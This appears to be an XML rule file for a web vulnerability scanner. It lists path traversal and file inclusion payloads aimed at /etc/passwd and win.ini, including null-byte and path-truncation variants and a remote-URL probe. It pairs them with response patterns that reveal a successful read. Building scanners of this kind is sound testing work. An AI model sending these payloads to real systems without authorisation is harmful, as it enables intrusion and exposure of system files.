<?xml version="1.0" encoding="UTF-8"?>
<rules>
    <couple id="1">
        <requests>
            C:/windows/win.ini
            C:/windows/win.ini%00.html
            C:/windows/windows/win.ini/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
            ../../../../../../../../../../../../../../../etc/passwd
            ../../../../../../../../../../../../../../../etc/passwd%00.html
            ../../../../../../../../../../../../../../../etc/passwd.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            https://github.com/evilcos/xssor2/blob/master/README.md?
        </requests>
        <responses>
            java.io.FileNotFoundException\:
            java.lang.Exception\:
            The server encountered an internal error \(.*\) that prevented it from fulfilling this request.
            Failed opening
            &lt;b&gt;Warning&lt;/b&gt;\:  file\(
            &lt;b&gt;Warning&lt;/b&gt;\:  file_get_contents\(
            root:x\:0\:0\:root\:
            Warning\: fopen\(
            No such file or directory
            [extensions]
            2018/07/29
        </responses>
    </couple>
</rules>